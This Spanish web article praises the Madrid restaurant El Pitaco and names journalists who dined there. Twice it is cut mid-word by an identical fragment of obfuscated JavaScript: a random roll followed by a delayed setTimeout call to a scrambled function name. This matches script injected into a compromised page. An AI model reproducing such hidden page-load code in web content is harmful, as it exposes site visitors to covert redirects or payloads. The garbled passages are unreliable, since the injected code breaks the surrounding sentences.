Los periodistas eligen restaurante

Un buen restaurante no lo hacen los personajes conocidos y famosos que lo visitan, hay muchísimo trabajo detrás, no solo en cocina, que es lo que realmente lo hace posible. Pero eso no quita que los famosos quieran conocerlos y disfrutar de ellos.

En el mundo de las modas y tendencias suele haber un denominador común: la búsqueda del placer y el bienestar. A partir de aquí, seguro que encontramos más factores influyentes. Lo cierto es que, en gastronomía, podemos encontrar restaurantes y locales que el público acaba poniendo de moda, generalmente líderes de opinión. No obstante, cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando existen hosteleros que dan tantos y tantos motivos, las palabras sobran.

Es el caso del restaurante el Pitaco, lugar elegido hoy por la periodista y Directora General de UGE España, Mamen Villalba, para comer con los periodistas Alfredo Urdaci y Antonio Jiménez, de la popular cadena de Televisión 13TV. Sin duda, se trata de uno de esos restaurantes, donde el buen ambiente y la buena mesa se unen para catalogarlo como uno de los favoritos por los consumidores en la capital madrileña.

IMG_6942

El propietario del restaurante, Esteban García, también facilita que esto esté pasandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando en su local. Se trata de un hombre amable y exigente a la hora de satisfacer el buen paladar de sus clientes. Con un servicio atento y una carta de temporada que asegura la calidad y frescura de la materia prima. Es el caso de las verduras, sin olvidar los guisos tradicionales, las carnes y pescados.

En definitiva, un lugar por donde ya han pasado periodistas y directivos de la Agencia EFE, la Sexta TV , Onda Cero o el Diario El Mundo, por mencionar solo algunos ejemplos. El Pitaco, parece ser uno de los rincones favoritos de los periodistas.

IMG_6932